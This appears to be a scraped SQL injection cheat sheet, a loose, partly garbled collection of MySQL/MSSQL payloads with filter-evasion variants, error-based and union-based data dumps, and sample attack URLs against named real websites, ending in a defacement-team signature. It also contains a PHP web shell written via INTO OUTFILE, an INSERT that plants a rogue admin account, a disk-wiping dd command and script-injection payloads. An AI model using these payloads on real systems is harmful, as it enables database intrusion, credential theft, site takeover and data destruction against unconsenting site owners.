concat(0x3a,,0x3c62723e)

/*!concat_ws(0x3a,)*/

concat_ws(0x3a3a3a,version()

CONCAT_WS(CHAR(32,58,32),version(),)

REVERSE(tacnoc)

binary(version())

uncompress(compress(version()))

aes_decrypt(aes_encrypt(version(),1),1)

==================================================================================================
==================================

To appear column numbr in page put after id

==================================================================================================
==================================

id=1+and+1=0+union+select+1,2,3,4,5,6

+AND+1=0

/*!aND*/ 1 like 0
+/*!and*/+1=0

+and+2>3+

+and(1)=(0)

and (1)!=(0)

+div+0

Having+1=0

==================================================================================================
=================================

function ByPassing

==================================================================================================
=================================

unhex(hex(value))

cast(value as char)

uncompress(compress(version()))

cast(version() as char)

aes_decrypt(aes_encrypt(version(),1),1)
binary(version())

convert(value using ascii)

==================================================================================================
=================================

avoid source page injection

==================================================================================================
=================================

concat(?”>,

,@@version,?

“>

injection

concat(0x223e,@@version)

concat(0x273e27,version(),0x3c212d2d)

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)

concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)

concat(‘’,@@version,’’)

concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)

concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)

==================================================================================================
=================================

get version – DB_NAME – user – HOST_NAME – datadir

==================================================================================================
=================================

version()

convert(version() using latin1)

unhex(hex(version()))

@@GLOBAL.VERSION

(substr(@@version,1,1)=5) :: 1 true 0 fals

# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –

==================================================================================================
================================

+and substring(version(),1,1)=4

+and substring(version(),1,1)=5

+and substring(version(),1,1)=9

+and substring(version(),1,1)=10

id=1 /*!50094aaaa*/ error

id=1 /*!50095aaaa*/ no error

id=1 /*!50096aaaa*/ error

# like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/

id=1 /*!40123 1=1*/–+- no error

id=1 /*!40122rrrr*/ no error

# like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4

==================================================================================================
===============================

DB_NAME()

==================================================================================================
===============================

@@database

database()

id=vv()

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –

http://www.marinaplast.com/page.php?id=vv()

@@user

user()

user_name()

system_user()

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –

HOST_NAME()

@@hostname

@@servername

SERVERPROPERTY()

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –

@@datadir

datadir()

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –

ASPX

and 1=0/@@version

‘ and 1=0/@@version;–
‘) and 1=@@version–

and 1=0/user;–

Requested method

[DUMP DB in 1 Request]

(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in
(@:=concat(@,0x0a,’ * ',table_schema,' + >’,table_name,’ > ‘,column_name))))x)

(select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)

==================================================================================================
=================================

[DUMP DB in 1 Request improve]

==================================================================================================
=================================

(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d
6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_na
me))))x)

like

http://www.marinaplast.com/page.php?id=-13 union select


1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu
mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c
oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –

==================================================================================================
=================================

#2#

==================================================================================================
=================================
method like DUMP DB in 1 Request

==================================================================================================
=================================

concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT
concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by
table_name LIMIT 1)))

like

http://www.mishnetorah.com/shop/details.php?id=-
26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT
concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by
table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21

==================================================================================================
=================================

#3#

==================================================================================================
=================================

databases

(select+count(schema_name) +from+information_schema.schemata)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name)


+from+information_schema.schemata),4,5 –

tables

(select+count(table_name) +from+information_schema.tables)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name)


+from+information_schema.tables),4,5 –
columns

(select+count(column_name) +from+information_schema.columns)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name)


+from+information_schema.columns),4,5 –

==================================================================================================
=================================

#4#

==================================================================================================
=================================

show the table with all her columns

CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))

+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+

like

http://www.marinaplast.com/page.php?id=-13 union select


1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE
table_schema=database() GROUP BY table_name LIMIT 0,1–+

==================================================================================================
=================================

#5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

==================================================================================================
=================================

feltered requested

# tables #

group_concat(/*!table_name*/)
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -

/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -

==================================================================================================
=================================

# columns #

==================================================================================================
=================================

group_concat(/*!column_name*/)

+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table

/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!froM*/ table– -

==================================================================================================
=================================

#6#

==================================================================================================
=================================

bypass method

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54abl
e_ScHEmA*/=schEMA())

(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%5
4able_name*/=hex table)

like

http://www.marinaplast.com/page.php?id=-13 union select


1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54
able_ScHEmA*/=schEMA()),4,5 –

==================================================================================================
=================================

#7#

==================================================================================================
=================================

bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,
%2037)

like

http://www.marinaplast.com/page.php?id=-13 union select


1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,
%2037)–

==================================================================================================
=================================

[+] Union Select:

==================================================================================================
=================================

union /*!select*/+
union/**/select/**/

/**/union/**/select/**/

/**/union/*!50000select*/

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/uniUNIONon/**/selSELECTect/**/

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

/**//*!union*//**//*!select*//**/

/**/UNunionION/**/SELselectECT/**/

/**//*UnIOn*//**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

/**/UNunionION/**/all/**/SELselectECT/**/

/**//*UnIOn*//**/all/**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

uni

%20union%20/*!select*/%20

union%23aa%0Aselect

union+distinct+select+

union+distinctROW+select+

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

/*!u%6eion*/+/*!se%6cect*/+

1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/
+%2F**/+Union/*!select*/

%55nion %53elect

+–+Union+–+Select+–+

+UnIoN/*&a=*/SeLeCT/*&a=*/

uNiOn aLl sElEcT

uUNIONnion all sSELECTelect

union(select(1),2,3)

union (select 1111,2222,3333)

union (/*!/**/ SeleCT */ 11)

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*–*//*!all*//*–*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

id=1+’UnI”On’+’SeL”ECT’

id=1+’UnI’||’on’+SeLeCT’

union select 1–+%0A,2–+%0A,3–+%0A etc ….

==================================================================================================
=================================

[+] Buffer overflow:

==================================================================================================
=================================

+And(select 1)=(select 0×414)+union+select+1–

+And(select 1)=(select 0xAAAA)+union+select+1–


+and (/*!select*/ 1)=(/*!select*/ 0xAA)+

+and (/*!select*/ 1)=(/*!select*/ 0×414)+

+And(select 1)=(select
0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141414141414141414141414141414141414141414141414141414141414141414141414?141
41414141414141414141414141414141414141414141414141414141414141414141414141414141
41414141414141414141414141414141414141414141414141414141414141414141414141414141
41414141414141414141414141414141414141414141414141414141414141414141414141414141
41414141414141414141414141414141414141414141414141414141414141414141414141414141
41414141414141414141414141414141414141414141414141414141414141414141414141414141
41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+

==================================================================================================
=================================

[+] Group Concat:

==================================================================================================
=================================

Group_Concat

group_concat()

/*!group_concat*/()

grOUp_ConCat(/*!*/,0x3e,/*!*/)

group_concat(,0x3c62723e)

g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29

CoNcAt()

CONCAT(DISTINCT Version())

concat(,0x3a,)

concat%00()

%00CoNcAt()

/*!50000cOnCat*/(/*!Version()*/)

/*!50000cOnCat*/

/**//*!12345cOnCat*/(,0x3a,)
concat_ws()

concat(0x3a,,0x3c62723e)

/*!concat_ws(0x3a,)*/

concat_ws(0x3a3a3a,version()

CONCAT_WS(CHAR(32,58,32),version(),)

==================================================================================================
=================================

ERORE BASED

==================================================================================================
=================================

=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–

Database

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from


information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)

Table_name

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from


information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)

Columns

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from


information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)
extract date

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select


count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the limit function in the query

A website can have more than 2 two databases, so increase the limit until you find all database names

Example: limit 0,1 or limit 1,1 or limit 2,1

==================================================================================================
=================================

Differences:

Error Based Query for Database Extraction:

==================================================================================================
=================================

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from


information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)

Double Query for Database Extraction:

and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from


information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a) and 1=1

and(select 1 from(select count(*),concat((select (select (SELECT distinct

concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


and(select 1 from(select count(*),concat((select (select (SELECT distinct

concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where

table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x


from

information_schema.tables group by x)a) and 1

==================================================================================================
=================================

WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+

==================================================================================================
=================================

Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.

Code: dd if=/dev/urandom of=/dev/sda bs=1M

I’d say using concat(0xY)

Y being ‘’ in hex

union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)

http://zerocoolhf.altervista.org/level2.php?id=-
1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20joi
n%20%28select%20database%28%29%29c%29–+

union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’,


hex(‘users’)

=113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns)


WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ * ',table_schema,' +
>’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
injection in sql database addd new user

INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'[email protected]’)

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam
e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE
X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

CHALLENGES

Code:

=(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(tabl
e_schema=database())and(table_name=0×7365637572697479))–+-

=12+and+false/*!union*/
/*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f
6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where
table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–

=/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–

=121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -

=121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-

=121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |

null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x

==================================================================================================
=================================

Error Based:

==================================================================================================
=================================

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–

or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)


from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -

or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from


information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version()
FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_
schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x

or 1=convert(int,(@@version))-

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–

+and+(select+1+from+(select+count(*),concat((select(select+concat(c
ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,
1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

(42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-

==================================================================================================
=================================

WAF BYPASS BY TOTTI

==================================================================================================
=================================

=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam
e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())
–-
=2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/
/*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -

==================================================================================================
=================================

WUBI –
1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00
)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name
))))x),3,4–

(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in
(@:=concat(@,0x0a,’ * ',table_schema,' + >’,table_name,’ > ‘,column_name))))x)

(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

==================================================================================================
=================================

+and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))

==================================================================================================
=================================

http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html

http://www.websec.ca/kb/sql_injection

http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html

==================================================================================================
=================================
test

http://www.mt.ro/nou/articol.php?id=-
angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+

…………………………………..

http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select


concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit
10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

SELECT “ system($_REQUEST*'cmd'+); ?>”

INTO OUTFILE “full/path/here/cmd.php”

------------Best Bypass WAF------------


========================

[~] order by [~]

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!00000Union*/ /*!00000Select*/

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion %53elect
%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+ #?uNiOn + #?sEleCt

+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

+union+distinct+select+
+union+distinctROW+select+

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

union (select 1111,2222,3333)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni on+sel ect+

+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/ /*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()

concat()

CON%08CAT()

CoNcAt()

%0AcOnCat()

/**//*!12345cOnCat*/

/*!50000cOnCat*/(/*!*/)

unhex(hex(concat(table_name)))

unhex(hex(/*!12345concat*/(table_name)))

unhex(hex(/*!50000concat*/(table_name)))
[~] group_concat() [~]

/*!group_concat*/()

gRoUp_cOnCAt()

group_concat(/*!*/)

group_concat(/*!12345table_name*/)

group_concat(/*!50000table_name*/)

/*!group_concat*/(/*!12345table_name*/)

/*!group_concat*/(/*!50000table_name*/)

/*!12345group_concat*/(/*!12345table_name*/)

/*!50000group_concat*/(/*!50000table_name*/)

/*!GrOuP_ConCaT*/()

/*!12345GroUP_ConCat*/()

/*!50000gRouP_cOnCaT*/()

/*!50000Gr%6fuP_c%6fnCAT*/()

unhex(hex(group_concat(table_name)))

unhex(hex(/*!group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(table_name)))

unhex(hex(/*!12345group_concat*/(/*!table_name*/)))

unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))

unhex(hex(/*!50000group_concat*/(table_name)))

unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))

convert(group_concat(table_name)+using+ascii)

convert(group_concat(/*!table_name*/)+using+ascii)

convert(group_concat(/*!12345table_name*/)+using+ascii)

convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)

CONVERT(group_concat(table_name)+USING+latin2)

CONVERT(group_concat(table_name)+USING+latin3)

CONVERT(group_concat(table_name)+USING+latin4)

CONVERT(group_concat(table_name)+USING+latin5)

[~] after id no. like id=1 +/*!and*/+1=0 [~]

+div+0

Having+1=0

+AND+1=0

+/*!and*/+1=0

and(1)=(0)

when the --+- or -- dosen't work use ;%00

bypass error 505

sometimes when union select ,sites become 505 or time out....

bypass-

-use brackets

union(select+1)

-use %0b or /**/ as space

union%0bselect
Hacked by You From Team Name Hacked By Mysterious

Coder From Innominate ।

https://www.facebook.com/innominate.official

https://www.facebook.com/groups/1060843833941377

https://www.facebook.com/groups/

www.facebook.com/100004445461825

You might also like